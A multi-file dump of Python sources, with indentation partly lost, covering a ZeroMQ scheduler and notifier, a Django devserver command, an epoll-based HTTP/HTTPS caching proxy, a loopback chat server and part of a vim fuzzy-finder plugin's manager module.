worker_num = self.workers_data[worker_id].worker_num
self.print_log("Recieved heartbeat from worker: {}".format(worker_num))
return 'h'
#--------------------------------------------------------------------------
def heartbeat(self):
while True:
print('waiting for heartbeat')
worker2head_message = self.head_socket.recv().decode()
            if worker2head_message[0] in self.handles:
head2worker_message = self.handles[worker2head_message[0]](
worker2head_message)
else:
raise Warning("Invalid message: {}".format(
worker2head_message))
self.head_socket.send_string(head2worker_message)
"""
===============================================================================
===============================================================================
"""
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--mode',required=False,type=str,
default='h')
parser.add_argument('--server',required=False,type=str,
default='{}:{}'.format(config.DEFAULT_HEAD_ADDRESS,
config.DEFAULT_HEAD_PORT))
args = parser.parse_args()
    re_check = re.search(r"((\d{1,3}\.){3}\d{1,3}:\d{1,5})", args.server)
    if re_check is None:
raise UserWarning("Invalid server arg: {}".format(args.server))
addr,port = args.server.split(':')
port = int(port)
if args.mode == 'h':
sh = SchedulerHead(head_addr=addr,head_port=port)
if __name__ == "__main__":
main()
|
notifier.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Int, Dict, Bool
import zmq
from threading import Thread, Lock
from pychron.messaging.broadcaster import Broadcaster
class Notifier(Broadcaster):
_handlers = Dict
port = Int
_lock = None
def setup(self, port):
if port:
self._lock = Lock()
context = zmq.Context()
self._setup_publish(context, port)
self._req_sock = context.socket(zmq.REP)
self._req_sock.bind("tcp://*:{}".format(port + 1))
#
t = Thread(name="ping_replier", target=self._handle_request)
t.setDaemon(1)
t.start()
def add_request_handler(self, name, func):
self._handlers[name] = func
def close(self):
with self._lock:
if self._sock:
self._sock.setsockopt(zmq.LINGER, 0)
self._sock.close()
self._sock = None
if self._req_sock:
self._req_sock.setsockopt(zmq.LINGER, 0)
self._req_sock.close()
self._req_sock = None
def send_notification(self, uuid, tag="RunAdded"):
msg = "{} {}".format(tag, uuid)
self.info("pushing notification - {}".format(msg))
self._send(msg)
def send_console_message(self, msg, tag="ConsoleMessage"):
msg = "{} {}".format(tag, msg)
self.info("push console message - {}".format(msg))
self._send(msg)
# private
def _port_changed(self):
if self.enabled:
self.setup(self.port)
def _handle_request(self):
sock = self._req_sock
poll = zmq.Poller()
poll.register(self._req_sock, zmq.POLLIN)
while sock:
socks = dict(poll.poll(1000))
with self._lock:
try:
if socks.get(sock) == zmq.POLLIN:
req = sock.recv()
if req == "ping":
sock.send("echo")
elif req in self._handlers:
func = self._handlers[req]
sock.send(func())
except zmq.ZMQBaseError:
pass
poll.unregister(self._req_sock)
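# A minimal client-side sketch of the request socket handled above (assumed
# usage, not part of pychron's public API): connect a REQ socket to port + 1
# and send "ping"; a live notifier replies with "echo".
def _example_ping(host, port, timeout_ms=1000):
    context = zmq.Context()
    sock = context.socket(zmq.REQ)
    sock.setsockopt(zmq.LINGER, 0)
    sock.connect("tcp://{}:{}".format(host, port + 1))
    sock.send(b"ping")
    reply = sock.recv() if sock.poll(timeout_ms) else None
    sock.close()
    return reply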
# ============= EOF =============================================
|
devserver.py
|
from __future__ import absolute_import, print_function, unicode_literals
import atexit
import logging
import os
import subprocess
import sys
from threading import Thread
from django.contrib.staticfiles.management.commands.runserver import Command as RunserverCommand
from django.core.management import call_command
from django.core.management.base import CommandError
from kolibri.content.utils.annotation import update_channel_metadata_cache
logger = logging.getLogger(__name__)
class Command(RunserverCommand):
"""
Subclass the RunserverCommand from Staticfiles to optionally run webpack.
"""
def __init__(self, *args, **kwargs):
self.webpack_cleanup_closing = False
self.webpack_process = None
self.karma_cleanup_closing = False
self.karma_process = None
super(Command, self).__init__(*args, **kwargs)
def add_arguments(self, parser):
parser.add_argument(
'--webpack',
action='store_true',
dest='webpack',
default=False,
help='Tells Django runserver to spawn a webpack watch subprocess.',
)
parser.add_argument(
'--lint',
action='store_true',
dest='lint',
default=False,
help='Tells Django runserver to run the linting option on webpack subprocess.',
)
parser.add_argument(
'--karma',
action='store_true',
dest='karma',
default=False,
help='Tells Django runserver to spawn a karma test watch subprocess.', )
super(Command, self).add_arguments(parser)
def handle(self, *args, **options):
if options["webpack"]:
self.spawn_webpack(lint=options["lint"])
if options["karma"]:
self.spawn_karma()
update_channel_metadata_cache()
# migrate the ormq DB before starting.
call_command("migrate", interactive=False, database="ormq")
return super(Command, self).handle(*args, **options)
def spawn_webpack(self, lint):
self.spawn_subprocess(
"webpack_process",
self.start_webpack,
self.kill_webpack_process,
lint=lint)
def spawn_karma(self):
self.spawn_subprocess("karma_process", self.start_karma,
self.kill_karma_process)
def spawn_subprocess(self, process_name, process_start, process_kill,
**kwargs):
# We're subclassing runserver, which spawns threads for its
# autoreloader with RUN_MAIN set to true, so we have to check for
# this to avoid spawning the watcher subprocess twice.
if not os.getenv('RUN_MAIN', False) and not getattr(
self, process_name):
subprocess_thread = Thread(target=process_start, kwargs=kwargs)
subprocess_thread.daemon = True
subprocess_thread.start()
atexit.register(process_kill)
def kill_webpack_process(self):
if self.webpack_process and self.webpack_process.returncode is not None:
return
logger.info('Closing webpack process')
self.webpack_cleanup_closing = True
self.webpack_process.terminate()
def start_webpack(self, lint=False):
if lint:
cli_command = 'yarn run watch -- --lint'
logger.info(
'Starting webpack process with linting from Django runserver command'
)
else:
cli_command = 'yarn run watch'
logger.info(
'Starting webpack process from Django runserver command')
self.webpack_process = subprocess.Popen(
cli_command,
shell=True,
stdin=subprocess.PIPE,
stdout=sys.stdout,
stderr=sys.stderr)
if self.webpack_process.poll() is not None:
raise CommandError(
'Webpack process failed to start from Django runserver command'
)
logger.info(
'Django Runserver command has spawned a Webpack watcher process on pid {0}'.
format(self.webpack_process.pid))
self.webpack_process.wait()
if self.webpack_process.returncode != 0 and not self.webpack_cleanup_closing:
logger.error("Webpack process exited unexpectedly.")
def kill_karma_process(self):
if self.karma_process and self.karma_process.returncode is not None:
return
logger.info('Closing karma process')
self.karma_cleanup_closing = True
self.karma_process.terminate()
def start_karma(self):
logger.info(
'Starting karma test watcher process from Django runserver command'
)
self.karma_process = subprocess.Popen(
'yarn run test-karma:watch',
shell=True,
stdin=subprocess.PIPE,
stdout=sys.stdout,
stderr=sys.stderr)
if self.karma_process.poll() is not None:
raise CommandError(
'Karma process failed to start from Django runserver command')
logger.info(
'Django Runserver command has spawned a Karma test watcher process on pid {0}'.
format(self.karma_process.pid))
self.karma_process.wait()
if self.karma_process.returncode != 0 and not self.karma_cleanup_closing:
logger.error("Karma process exited unexpectedly.")
|
proxy_server.py
|
# This proxy supports both HTTP and HTTPS.
# Because of the TLS/SSL protocol, the payload of an HTTPS connection cannot be read or cached.
# This proxy server only runs on Linux (kernel 2.5.44+), because it relies on epoll.
import socket
import os
import threading
import select
import hashlib
import traceback
bind_host = ('0.0.0.0', 8080)
bind_num = 20
# An HTTP request header parser.
# Provides a simple API similar to BaseHTTPRequestHandler in Python 2.
class HTTPRequestParser(object):
def __init__(self, message):
try:
if isinstance(message, bytes):
message = message.decode()
command_line = message.split('\r\n')[0]
self.command = command_line.split()[0]
self.path = command_line.split()[1]
self.request_version = command_line.split()[2]
self.headers = {}
lines = message.split('\r\n')[1:]
headers = lines[:lines.index('')]
for header in headers:
header_item, header_data = header.split(': ', 1)
self.headers[header_item.lower()] = header_data
except Exception:
raise Exception("Illegal HTTP header")
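# Hedged example (not part of the original file): parsing a raw proxy-style
# request with the class above; the request bytes are made up for illustration.
def _example_parse_request():
    raw = (b'GET http://example.com/index.html HTTP/1.1\r\n'
           b'Host: example.com\r\n'
           b'Connection: close\r\n'
           b'\r\n')
    request = HTTPRequestParser(raw)
    # request.command == 'GET'
    # request.path == 'http://example.com/index.html'
    # request.request_version == 'HTTP/1.1'
    # request.headers == {'host': 'example.com', 'connection': 'close'}
    return request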
def forwardMsg(clientSocket, serverSocket, initMsg=[], cache=False, bufferSize=4096):
# Close all connections
def _closeConnection(epoll, clientSocket, serverSocket):
epoll.close()
clientSocket.close()
serverSocket.close()
# Check whether a file has been cached or can be cached.
# Return Format:
# return a tuple with two elements (_valid, _file)
# _valid will be True if the request has been cached, otherwise, False.
# _file will be a file object if the request has been cached or can be cached. Otherwise, None.
def _checkCacheFile(message_list):
message = b''
for msg in message_list:
message += msg
request = HTTPRequestParser(message)
# Only cache request with method GET.
if request.command == 'GET':
# Hash the message with MD5 algorithm.
# Two requests are treated as the same only when their whole request messages are identical.
hash = hashlib.md5()
hash.update(message)
filename = 'cache/' + hash.hexdigest()
if os.path.exists(filename):
return True, open(filename, 'rb')
else:
return False, open(filename, 'wb')
else:
return False, None
# Create a epoll object to efficiently solve I/O multiplexing problem.
http_epoll = select.epoll()
# Register client to read event.
http_epoll.register(clientSocket.fileno(), select.EPOLLIN)
# Register server to write event.
http_epoll.register(serverSocket.fileno(), select.EPOLLOUT)
opposites = {serverSocket.fileno(): clientSocket.fileno(), clientSocket.fileno(): serverSocket.fileno()}
sockets = {serverSocket.fileno(): serverSocket, clientSocket.fileno(): clientSocket}
buff = {serverSocket.fileno(): initMsg, clientSocket.fileno(): []}
cacheFile = None
try:
while True:
# Catch the socket events.
events = http_epoll.poll()
for fileno, event in events:
if event & select.EPOLLHUP:
# Finish caching when socket closed.
if cache and cacheFile != None:
cacheFile.close()
cacheFile = None
# Close the connection when the socket has hung up.
_closeConnection(http_epoll, clientSocket, serverSocket)
return
elif event & select.EPOLLIN:
# Socket is now available for reading.
data = sockets[fileno].recv(bufferSize)
if data:
# Append data to sending buffer of the other socket.
buff[opposites[fileno]].append(data)
# The other socket is now ready to send message and register the event.
http_epoll.modify(opposites[fileno], select.EPOLLOUT)
# Finish caching when there is another request sent from browser.
if cache and cacheFile != None and fileno == clientSocket.fileno():
cacheFile.close()
cacheFile = None
# Cache the data from remote server if a file is being cached.
elif cache and cacheFile != None and fileno == serverSocket.fileno():
cacheFile.write(data)
else:
# Finish caching when socket closed.
if cache and cacheFile != None and fileno == serverSocket.fileno():
cacheFile.close()
cacheFile = None
# Close connection when socket closed by remote.
_closeConnection(http_epoll, clientSocket, serverSocket)
return
elif event & select.EPOLLOUT:
# Socket is now available for writing.
# Check whether the request has been cached or can be cached before sending it to the server.
if cache and fileno == serverSocket.fileno():
valid, file = _checkCacheFile(buff[fileno])
if valid:
# The request has been cached, respond to the browser immediately.
buff[opposites[fileno]].append(file.read())
# Clean the sending buffer.
buff[fileno].clear()
# Clean events between proxy and server.
http_epoll.modify(fileno, 0)
# The socket to the browser is now ready to send message and register the event.
http_epoll.modify(opposites[fileno], select.EPOLLOUT)
print('read from cache')
# Prevent the request from being sent to the server.
continue
else:
# The request is being cached.
cacheFile = file
# Forward message to the other side.
for data in buff[fileno]:
sockets[fileno].send(data)
# Clean the sending buffer.
buff[fileno].clear()
# The socket is now ready to receive message and register the event.
http_epoll.modify(fileno, select.EPOLLIN)
except BrokenPipeError:
# Socket closed unexpectedly by the peer.
print("connection closed by remote server")
finally:
_closeConnection(http_epoll, clientSocket, serverSocket)
def httpsProxy(connectionSocket, message, host, port=443):
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to the socket.
serverSocket.connect((host, port))
# Parse the header and get request version.
request = HTTPRequestParser(message)
# Send response to browser.
connectionSocket.send("{} 200 Connection Established\r\n\r\n".format(request.request_version).encode())
# Forward message to the server.
forwardMsg(connectionSocket, serverSocket)
except:
traceback.print_exc()
print("Illegal request")
def httpProxy(connectionSocket, message, host, port=80):
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to the socket.
serverSocket.connect((host, port))
# Forward message and cache files.
forwardMsg(connectionSocket, serverSocket, initMsg=[message], cache=True)
except:
traceback.print_exc()
print("Illegal request")
def proxyServe(serverSocket):
while True:
# Start receiving data from the client.
connectionSocket, addr = serverSocket.accept()
message = connectionSocket.recv(1024)
try:
# Try to Parse HTTP header.
request = HTTPRequestParser(message)
except Exception as e:
# Ignore the request if it is malformed.
print(str(e))
continue
host_prot = request.headers['host']
if ':' in host_prot:
host, port = host_prot.split(':')
port = int(port)
else:
host = host_prot
port = 80
print(host, port)
if request.command == 'CONNECT':
thread = threading.Thread(target=httpsProxy, args=(connectionSocket, message, host, port))
thread.start()
else:
thread = threading.Thread(target=httpProxy, args=(connectionSocket, message, host, port))
thread.start()
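# Hedged test-client sketch (not part of the original file): send one plain
# HTTP GET through the proxy with a raw socket. The Host header is what the
# proxy uses to pick the destination, and since the method is GET the response
# is cached under cache/<md5 of the request>. example.com and the function
# name are illustrative only.
def example_request_via_proxy(host='example.com', proxy_addr=('127.0.0.1', 8080)):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(proxy_addr)
    request = ('GET / HTTP/1.1\r\n'
               'Host: {}\r\n'
               'Connection: close\r\n\r\n').format(host)
    client.sendall(request.encode())
    response = b''
    while True:
        chunk = client.recv(4096)
        if not chunk:
            break
        response += chunk
    client.close()
    return response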
if __name__ == '__main__':
# Create a server socket, bind it to a port and start listening.
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind(bind_host)
serverSocket.listen(bind_num)
# Make directory to store cache file.
if not os.path.exists('cache'):
os.mkdir('cache')
try:
proxyServe(serverSocket)
except KeyboardInterrupt:
serverSocket.close()
|
FinalProjectServer.py
|
# imports
import socket
import threading
class ChatServer:
clients_list = []
last_received_message = ""
def __init__(self):
self.server_socket = None
self.create_listening_server()
# Listen for incoming connections
def create_listening_server(self):
self.server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) # create a TCP socket over IPv4
local_ip = '127.0.0.1'
local_port = 10319
# SO_REUSEADDR allows the server to be restarted immediately on the same port
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind to the loopback address, so only clients on this machine can connect
self.server_socket.bind((local_ip, local_port))
print("Listening for incoming messages..")
self.server_socket.listen(5) # listen for incoming connections (backlog of 5)
self.receive_messages_in_a_new_thread()
# Receive new messages from a client
def receive_messages(self, so):
while True:
incoming_buffer = so.recv(256) # receive up to 256 bytes
if not incoming_buffer:
break
self.last_received_message = incoming_buffer.decode('utf-8')
self.broadcast_to_all_clients(so) # send to all clients
so.close()
# broadcast the message to all clients
def broadcast_to_all_clients(self, senders_socket):
for client in self.clients_list:
client_socket, (ip, port) = client
if client_socket is not senders_socket:
client_socket.sendall(self.last_received_message.encode('utf-8'))
def receive_messages_in_a_new_thread(self):
while True:
client = so, (ip, port) = self.server_socket.accept()
self.add_to_clients_list(client)
print('Connected to ', ip, ':', str(port))
t = threading.Thread(target=self.receive_messages, args=(so,))
t.start()
# add a new client
def add_to_clients_list(self, client):
if client not in self.clients_list:
self.clients_list.append(client)
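# Hedged client sketch (not part of the original file): a minimal command-line
# client for the ChatServer above. It connects to the hard-coded
# 127.0.0.1:10319 endpoint, prints whatever other clients send, and forwards
# each line typed on stdin. The function name is illustrative only.
def example_chat_client():
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('127.0.0.1', 10319))

    def _listen():
        while True:
            data = client_socket.recv(256)
            if not data:
                break
            print(data.decode('utf-8'))

    threading.Thread(target=_listen, daemon=True).start()
    while True:
        client_socket.sendall(input().encode('utf-8'))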
if __name__ == "__main__":
ChatServer()
|
manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import os
import sys
import time
import operator
import itertools
import threading
import multiprocessing
from functools import partial
from functools import wraps
from .instance import LfInstance
from .cli import LfCli
from .utils import *
from .fuzzyMatch import FuzzyMatch
from .asyncExecutor import AsyncExecutor
is_fuzzyEngine_C = False
try:
import fuzzyEngine
is_fuzzyEngine_C = True
cpu_count = multiprocessing.cpu_count()
lfCmd("let g:Lf_fuzzyEngine_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyEngine_C = 0")
is_fuzzyMatch_C = False
try:
import fuzzyMatchC
is_fuzzyMatch_C = True
lfCmd("let g:Lf_fuzzyMatch_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyMatch_C = 0")
if sys.version_info >= (3, 0):
def isAscii(str):
try:
str.encode("ascii")
return True
except UnicodeEncodeError:
return False
else:
def isAscii(str):
try:
str.decode("ascii")
return True
except UnicodeDecodeError:
return False
def modifiableController(func):
@wraps(func)
def deco(self, *args, **kwargs):
self._getInstance().buffer.options['modifiable'] = True
func(self, *args, **kwargs)
self._getInstance().buffer.options['modifiable'] = False
return deco
def catchException(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except vim.error as e: # for neovim
if str(e) != "b'Keyboard interrupt'" and str(e) != 'Keyboard interrupt':
raise e
elif self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
except KeyboardInterrupt: # <C-C>, this does not work in vim
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
return deco
#*****************************************************
# Manager
#*****************************************************
class Manager(object):
def __init__(self):
self._autochdir = 0
self._instance = None
self._cli = LfCli()
self._explorer = None
self._content = []
self._index = 0
self._help_length = 0
self._show_help = False
self._selections = {}
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
self._highlight_ids = []
self._orig_line = ''
self._ctrlp_pressed = False
self._fuzzy_engine = None
self._result_content = []
self._reader_thread = None
self._timer_id = None
self._highlight_method = lambda : None
self._orig_cwd = None
self._cursorline_dict = {}
self._empty_query = lfEval("get(g:, 'Lf_EmptyQuery', 1)") == '1'
self._preview_in_popup = lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1'
self._preview_winid = 0
self._match_ids = []
self._vim_file_autoloaded = False
self._getExplClass()
#**************************************************************
# abstract methods, in fact all the functions can be overridden
#**************************************************************
def _getExplClass(self):
"""
this function MUST be overridden
return the name of Explorer class
"""
raise NotImplementedError("Can't instantiate abstract class Manager "
"with abstract methods _getExplClass")
def _defineMaps(self):
pass
def _cmdExtension(self, cmd):
"""
this function can be overridden to add new cmd
if return true, exit the input loop
"""
pass
def _argaddFiles(self, files):
# It will raise E480 without 'silent!'
lfCmd("silent! argdelete *")
for file in files:
lfCmd("argadd %s" % escSpecial(file))
def _issue_422_set_option(self):
if lfEval("has('nvim')") == '1':
lfCmd("silent! setlocal number<")
lfCmd("silent! setlocal relativenumber<")
lfCmd("silent! setlocal foldlevel<")
lfCmd("silent! setlocal cursorline<")
lfCmd("silent! setlocal colorcolumn<")
lfCmd("silent! setlocal winhighlight<")
def _acceptSelection(self, *args, **kwargs):
if len(args) == 0:
return
file = args[0]
try:
if not os.path.isabs(file):
file = os.path.join(self._getInstance().getCwd(), lfDecode(file))
file = os.path.normpath(lfEncode(file))
if kwargs.get("mode", '') != 't' or (lfEval("get(g:, 'Lf_DiscardEmptyBuffer', 0)") == '1'
and len(vim.tabpages) == 1 and len(vim.current.tabpage.windows) == 1
and vim.current.buffer.name == '' and len(vim.current.buffer) == 1
and vim.current.buffer[0] == '' and not vim.current.buffer.options["modified"]):
if vim.current.buffer.options["modified"]:
lfCmd("hide edit %s" % escSpecial(file))
else:
lfCmd("edit %s" % escSpecial(file))
else:
lfCmd("tab drop %s" % escSpecial(file))
except vim.error as e: # E37
lfPrintError(e)
def _getDigest(self, line, mode):
"""
this function can be overridden
specify what part in the line to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if mode == 0:
return line
elif mode == 1:
return getBasename(line)
else:
return getDirname(line)
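# Hedged illustration (not part of the original code), for a made-up line
# "autoload/leaderf/manager.vim":
#   mode 0 -> "autoload/leaderf/manager.vim"  (full path)
#   mode 1 -> "manager.vim"                   (name only)
#   mode 2 -> the directory part, e.g. "autoload/leaderf"
#             (the exact form depends on getDirname() from utils)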
def _getDigestStartPos(self, line, mode):
"""
this function can be overridden
return the start position of the digest returned by _getDigest()
Args:
mode: 0, return the start position of the full path
1, return the start position of the name only
2, return the start position of the directory name
"""
if mode == 0 or mode == 2:
return 0
else:
return lfBytesLen(getDirname(line))
def _createHelp(self):
return []
def _setStlMode(self, **kwargs):
if self._cli.isFuzzy:
if self._getExplorer().supportsNameOnly():
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
else:
mode = 'Fuzzy'
else:
mode = 'Regex'
modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"}
for opt in kwargs.get("arguments", {}):
if opt in modes:
if opt == "--regexMode":
mode = 'Regex'
elif self._getExplorer().supportsNameOnly():
if opt == "--nameOnly":
mode = 'NameOnly'
elif opt == "--fullPath":
mode = 'FullPath'
else: # "--fuzzy"
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
elif opt in ("--nameOnly", "--fullPath", "--fuzzy"):
mode = 'Fuzzy'
break
self._getInstance().setStlMode(mode)
self._cli.setCurrentMode(mode)
def _beforeEnter(self):
self._resetAutochdir()
self._cur_buffer = vim.current.buffer
def _afterEnter(self):
if self._vim_file_autoloaded == False:
category = self._getExplorer().getStlCategory()
if category == 'Colorscheme':
category = 'Colors'
lfCmd("silent! call leaderf#%s#a_nonexistent_function()" % category)
self._vim_file_autoloaded = True
if "--nowrap" in self._arguments:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal nowrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:false)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = False
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal wrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:true)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = True
if self._getInstance().getWinPos() != 'popup':
self._defineMaps()
id = int(lfEval("matchadd('Lf_hl_cursorline', '.*\%#.*', 9)"))
self._match_ids.append(id)
else:
lfCmd("""call win_execute({}, 'let matchid = matchadd(''Lf_hl_cursorline'', ''.*\%#.*'', 9)')"""
.format(self._getInstance().getPopupWinId()))
id = int(lfEval("matchid"))
self._match_ids.append(id)
if is_fuzzyEngine_C:
self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False)
def _beforeExit(self):
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
self.clearSelections()
self._getExplorer().cleanup()
if self._fuzzy_engine:
fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine)
self._fuzzy_engine = None
if self._reader_thread and self._reader_thread.is_alive():
self._stop_reader_thread = True
self._closePreviewPopup()
if self._getInstance().getWinPos() == 'popup':
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._match_ids = []
def _afterExit(self):
pass
def _bangEnter(self):
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
self._cli.hideCursor()
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._resetHighlights()
if self._cli.pattern and self._index == 0:
self._search(self._content)
def _bangReadFinished(self):
pass
def _getList(self, pairs):
"""
this function can be overridden
return a list constructed from pairs
Args:
pairs: a list of tuple(weight, line, ...)
"""
return [p[1] for p in pairs]
def _getUnit(self):
"""
indicates how many lines are considered as a unit
"""
return 1
def _supportsRefine(self):
return False
def _previewInPopup(self, *args, **kwargs):
pass
def _closePreviewPopup(self):
if lfEval("has('nvim')") == '1':
if self._preview_winid:
if int(lfEval("nvim_win_is_valid(%d) == v:true" % self._preview_winid)):
lfCmd("call nvim_win_close(%d, 1)" % self._preview_winid)
self._preview_winid = 0
else:
if self._preview_winid:
lfCmd("call popup_close(%d)" % self._preview_winid)
self._preview_winid = 0
def _previewResult(self, preview):
if self._getInstance().getWinPos() == 'floatwin':
self._cli.buildPopupPrompt()
if int(lfEval("win_id2win(%d)" % self._preview_winid)) != vim.current.window.number:
self._closePreviewPopup()
if not self._needPreview(preview):
return
line = self._getInstance().currentLine
if self._preview_in_popup:
self._previewInPopup(line)
return
orig_pos = self._getInstance().getOriginalPos()
cur_pos = (vim.current.tabpage, vim.current.window, vim.current.buffer)
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = 'BufLeave,WinEnter,BufEnter'
try:
vim.current.tabpage, vim.current.window = orig_pos[:2]
self._acceptSelection(line)
lfCmd("augroup Lf_Cursorline")
lfCmd("autocmd! BufwinEnter <buffer> setlocal cursorline<")
lfCmd("augroup END")
finally:
vim.current.tabpage, vim.current.window, vim.current.buffer = cur_pos
vim.options['eventignore'] = saved_eventignore
def _restoreOrigCwd(self):
if self._orig_cwd is None:
return
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
try:
if int(lfEval("&autochdir")) == 0 and os.getcwd() != self._orig_cwd:
chdir(self._orig_cwd)
except:
if os.getcwd() != self._orig_cwd:
chdir(self._orig_cwd)
def _needExit(self, line, arguments):
return True
def setArguments(self, arguments):
self._arguments = arguments
def getArguments(self):
return self._arguments
#**************************************************************
def _createPopupModePreview(self, title, buf_number, line_nr, jump_cmd):
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2
else:
maxwidth = min(width, int(lfEval("&columns")))
relative = 'editor'
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
float_window = self._getInstance().window
float_win_pos = lfEval("nvim_win_get_position(%d)" % float_window.id)
float_win_row, float_win_col = [int(i) for i in float_win_pos]
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
anchor = "NW"
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
row = float_win_row + float_window.height + statusline_height
col = float_win_col
height = int(lfEval("&lines")) - row - 2
width = float_window.width
elif preview_pos.lower() == 'top':
anchor = "SW"
row = float_win_row - 1
col = float_win_col
height = row
width = float_window.width
else:
anchor = "SW"
start = int(lfEval("line('w0')")) - 1
end = int(lfEval("line('.')")) - 1
col_width = float_window.width - int(lfEval("&numberwidth")) - 1
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
row = float_win_row + delta_height
col = float_win_col + int(lfEval("&numberwidth")) + 1 + float_window.cursor[1]
height = row
width = maxwidth
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (buf_number, str(config))))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldlevel', 1000)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'winhighlight', 'Normal:Lf_hl_popup_window')" % self._preview_winid)
lfCmd("redraw!")
else:
popup_window = self._getInstance().window
popup_pos = lfEval("popup_getpos(%d)" % popup_window.id)
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
maxwidth = int(popup_pos["width"]) - 1 # there is one column of padding on the left
col = int(popup_pos["col"])
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
line = int(popup_pos["line"]) + int(popup_pos["height"]) + statusline_height
pos = "topleft"
maxheight = int(lfEval("&lines")) - line - 2
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
elif preview_pos.lower() == 'top':
maxwidth = int(popup_pos["width"]) - 1 # there is one column of padding on the left
col = int(popup_pos["col"])
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window) - 1(title)
maxheight = int(popup_pos["line"]) - 3
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
pos = "botleft"
